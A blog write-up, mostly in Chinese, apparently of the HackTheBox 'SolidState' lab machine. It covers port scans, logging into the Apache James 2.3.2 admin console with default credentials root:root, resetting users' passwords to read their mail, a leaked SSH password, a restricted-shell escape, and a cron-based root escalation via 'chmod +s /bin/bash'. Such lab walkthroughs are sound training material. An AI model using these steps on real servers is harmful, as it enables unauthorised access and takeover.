SolidState

TelBo_on published on
3 min, 598 words

Categories: OSCP

Tags: james weak password Info Leak HTB

Recon

Ports

nmap -sT -sC -sV -p22,25,80,110,119,4555 10.129.74.180
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-16 23:30 +08
Nmap scan report for 10.129.74.180
Host is up (0.12s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
110/tcp  open  pop3?
119/tcp  open  nntp?
4555/tcp open  rsip?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 408.28 seconds

端口扫描我习惯性扫两遍,第一遍使用-F大致了解开放了什么常用选项,第二遍再全扫描。 这里第二遍扫描时出现了一个4555端口。与James 邮件服务有关。 这里对80端口进行浏览,发现仅为一个前端展示界面,无特殊功能点。对其余几个邮件服务端口进行测试。

port 25

telnet 10.129.74.180 25
Trying 10.129.74.180...
Connected to 10.129.74.180.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Fri, 16 May 2025 11:48:51 -0400 (EDT)
AUTH LOGIN   
334 VXNlcm5hbWU6
root
334 UGFzc3dvcmQ6
root
535 Authentication Failed

需要进行登录,这里显示了相关的服务器信息:JAMES SMTP Server 2.3.2。先不管,继续下看。

port 110

telnet 10.129.74.180 110
Trying 10.129.74.180...
Connected to 10.129.74.180.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
help
-ERR
user asss
+OK
pass asd
-ERR Authentication failed.

也需要进行登录,(JAMES POP3 Server 2.3.2) 再次出现。

port 119

119端口为NNTP(网络新闻传输协议)的端口。访问看看

telnet 10.129.74.180 119
Trying 10.129.74.180...
Connected to 10.129.74.180.
Escape character is '^]'.
200 solidstate NNTP Service Ready, posting permitted
list
215 list of newsgroups follows
org.apache.james.dev 0 0 y
org.apache.avalon.dev 0 0 y
org.apache.avalon.user 0 0 y
org.apache.james.user 0 0 y

org.apache.james也显示了james服务。搜索JAMES 2.3.2相关信息。4555端口为:JAMES Remote Administration Tool。 同时发现存在漏洞。(截至2025年):是Apache James Server 2.3.2 存在一个 经过身份验证的远程命令执行漏洞(RCE),该漏洞源于其对用户输入处理不当,结合其对邮件投递过程中的本地命令执行支持(如 pipe transport),攻击者可以在认证成功后构造恶意邮件触发远程命令执行。 大致过程是通过弱口令登录4555端口,创建一个用户,然后构建带恶意payload的邮件发送。但是需要目标用户登录系统后才能得到反弹shell。这里的我们无法利用,无法降维打击。。。 搜索发现JAMES 2.3.2存在默认凭据root:root。尝试可以登录4555端口。

 telnet 10.129.74.180 4555 
Trying 10.129.74.180...
Connected to 10.129.74.180.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection

存在数个用户,且能够重置他们密码。这里我都重置为123,然后登录pop3服务器。在用户mindy下存在两封文件,存在mindy的凭据。ssh登录成功。

telnet 10.129.74.180 110 
Trying 10.129.74.180...                         
Connected to 10.129.74.180.                                                                                          
Escape character is '^]'.       
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready  
user mindy                                 
+OK                      
pass 123            
+OK Welcome mindy
list       
+OK 2 1945
1 1109
2 836                                      
.                                                                                  retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
elivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

User and Root

ssh登录后发现这是一个restricd shell,path限制在./bin中,除了ls cat命令可以执行,env等其他命令无法执行。 尝试绕过: ssh mindy@xxx.xxx.xxx.xxx -t bash绕过了限制,搜集信息过程中发现:

bash-4.4$ ls -al
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 May 27  2022 ..
drwxr-xr-x 11 root root 4096 Apr 26  2021 james-2.3.2
-rwxrwxrwx  1 root root  142 May 16 11:16 tmp.py

可以修改tmp.py。发现root存在定时任务的进程,虽然无法得知其具体内容,但结合tmp.py的内容,猜测此脚本会被定时执行,修改:chmod +s /bin/bash。等待几分钟后获得了root。

Summary

一个古老的历史机器,传统常规的渗透思路,熟悉思路。